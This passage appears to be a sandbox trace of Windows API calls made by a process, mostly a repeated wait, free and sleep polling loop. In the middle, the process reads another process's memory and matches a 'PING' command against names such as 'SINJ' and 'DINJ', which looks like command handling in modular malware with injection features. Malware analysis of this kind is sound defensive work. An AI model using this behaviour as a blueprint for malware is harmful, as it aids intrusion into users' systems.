	[0235.255] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.255] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737de0) returned 1
	[0235.255] Sleep (dwMilliseconds=0xbb8) 
	[0235.264] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.264] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.264] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.264] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.264] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.264] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737de0) returned 1
	[0235.264] Sleep (dwMilliseconds=0xbb8) 
	[0235.280] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.280] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.280] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.280] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.280] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.280] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0008) returned 1
	[0235.280] Sleep (dwMilliseconds=0xbb8) 
	[0235.295] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.295] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.295] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.296] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.296] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0008) returned 1
	[0235.296] Sleep (dwMilliseconds=0xbb8) 
	[0235.316] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.316] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.316] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.316] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.316] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.316] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.316] Sleep (dwMilliseconds=0xbb8) 
	[0235.327] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.327] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.327] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.327] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.327] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.327] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.327] Sleep (dwMilliseconds=0xbb8) 
	[0235.342] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.342] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.342] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.342] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.343] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.343] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.343] Sleep (dwMilliseconds=0xbb8) 
	[0235.358] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.358] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.358] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.358] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.358] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.358] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.358] Sleep (dwMilliseconds=0xbb8) 
	[0235.374] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.374] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.374] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.374] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.374] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.374] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.374] Sleep (dwMilliseconds=0xbb8) 
	[0235.389] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.390] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.390] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.390] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.390] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.390] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.390] Sleep (dwMilliseconds=0xbb8) 
	[0235.405] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.405] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.405] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.405] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.405] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.405] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.405] Sleep (dwMilliseconds=0xbb8) 
	[0235.420] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.420] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.420] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.420] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.421] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.421] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.421] Sleep (dwMilliseconds=0xbb8) 
	[0235.443] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.443] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.443] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.443] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.443] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.443] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.443] Sleep (dwMilliseconds=0xbb8) 
	[0235.452] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.452] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.452] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.452] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.452] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.452] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.452] Sleep (dwMilliseconds=0xbb8) 
	[0235.467] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.467] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.467] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.467] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.467] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.467] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.467] Sleep (dwMilliseconds=0xbb8) 
	[0235.483] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.483] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.483] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.483] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.483] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.483] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.483] Sleep (dwMilliseconds=0xbb8) 
	[0235.498] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.499] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.499] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.499] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.499] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.499] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.499] Sleep (dwMilliseconds=0xbb8) 
	[0235.514] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.514] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.514] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.514] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.514] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.514] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.514] Sleep (dwMilliseconds=0xbb8) 
	[0235.530] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.530] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.530] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.530] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.530] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.530] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.530] Sleep (dwMilliseconds=0xbb8) 
	[0235.545] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.545] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.545] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.545] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.545] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.545] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.545] Sleep (dwMilliseconds=0xbb8) 
	[0235.561] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.561] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.561] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.561] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.561] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.561] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.561] Sleep (dwMilliseconds=0xbb8) 
	[0235.577] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.577] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.577] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.577] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.577] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.577] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.577] Sleep (dwMilliseconds=0xbb8) 
	[0235.592] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.592] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.592] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.592] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.592] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.592] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.592] Sleep (dwMilliseconds=0xbb8) 
	[0235.608] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.608] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.608] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.608] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.608] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.608] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.608] Sleep (dwMilliseconds=0xbb8) 
	[0235.623] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0235.623] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0235.623] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0235.624] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0235.624] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0235.624] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0235.624] Sleep (dwMilliseconds=0xbb8) 
	[0235.640] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.003] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.003] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.003] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.003] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.003] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0236.003] Sleep (dwMilliseconds=0xbb8) 
	[0236.013] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.013] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.013] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.013] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.013] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.013] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0236.013] Sleep (dwMilliseconds=0xbb8) 
	[0236.029] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.029] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.029] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.029] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.029] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.029] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0288) returned 1
	[0236.029] Sleep (dwMilliseconds=0xbb8) 
	[0236.044] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0236.044] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225fc8
	[0236.044] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x27f3f18
	[0236.044] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x226050
	[0236.045] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0236.045] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225fc8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225fc8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0236.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225fc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0236.045] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0236.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225fc8, cbMultiByte=-1, lpWideCharStr=0x27e1630, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0236.045] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x27f3f18, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x27f3f18, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0236.045] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x226050, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x226050*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0236.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x226050, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0236.045] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c02b0
	[0236.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x226050, cbMultiByte=-1, lpWideCharStr=0x27c02b0, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0236.045] SetEvent (hEvent=0x474) returned 1
	[0236.045] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225fc8) returned 1
	[0236.045] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27f3f18) returned 1
	[0236.045] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x226050) returned 1
	[0236.045] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c02d8
	[0236.045] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0236.045] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0236.045] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0236.046] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0236.046] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0236.046] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1648
	[0236.046] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27c0288, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xbec) returned 0x6a8
	[0236.046] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0300
	[0236.046] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.046] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.046] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.046] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.046] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0300) returned 1
	[0236.046] Sleep (dwMilliseconds=0xbb8) 
	[0236.060] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.060] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.060] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.060] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.060] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.060] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0300) returned 1
	[0236.060] Sleep (dwMilliseconds=0xbb8) 
	[0236.077] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.077] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.077] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.077] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.077] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.077] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0300) returned 1
	[0236.077] Sleep (dwMilliseconds=0xbb8) 
	[0236.091] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.091] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.091] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.091] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.091] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.091] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0300) returned 1
	[0236.091] Sleep (dwMilliseconds=0xbb8) 
	[0236.107] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.107] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.107] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.107] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.107] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.107] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.107] Sleep (dwMilliseconds=0xbb8) 
	[0236.122] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.122] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.122] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.122] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.122] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.122] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.122] Sleep (dwMilliseconds=0xbb8) 
	[0236.138] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.138] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.138] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.138] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.138] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.138] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.138] Sleep (dwMilliseconds=0xbb8) 
	[0236.156] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.156] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.156] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.156] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.156] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.156] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.156] Sleep (dwMilliseconds=0xbb8) 
	[0236.194] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.194] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.194] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.194] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.194] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.194] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.194] Sleep (dwMilliseconds=0xbb8) 
	[0236.228] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.228] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.228] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.228] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.228] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.228] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.228] Sleep (dwMilliseconds=0xbb8) 
	[0236.267] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.267] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.267] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.267] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.267] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.267] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.267] Sleep (dwMilliseconds=0xbb8) 
	[0236.279] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.279] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.279] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.279] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.279] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.279] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.279] Sleep (dwMilliseconds=0xbb8) 
	[0236.294] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0236.294] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0236.294] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0236.294] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0236.294] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0236.294] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0508) returned 1
	[0236.294] Sleep (dwMilliseconds=0xbb8) 
	[0236.310] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
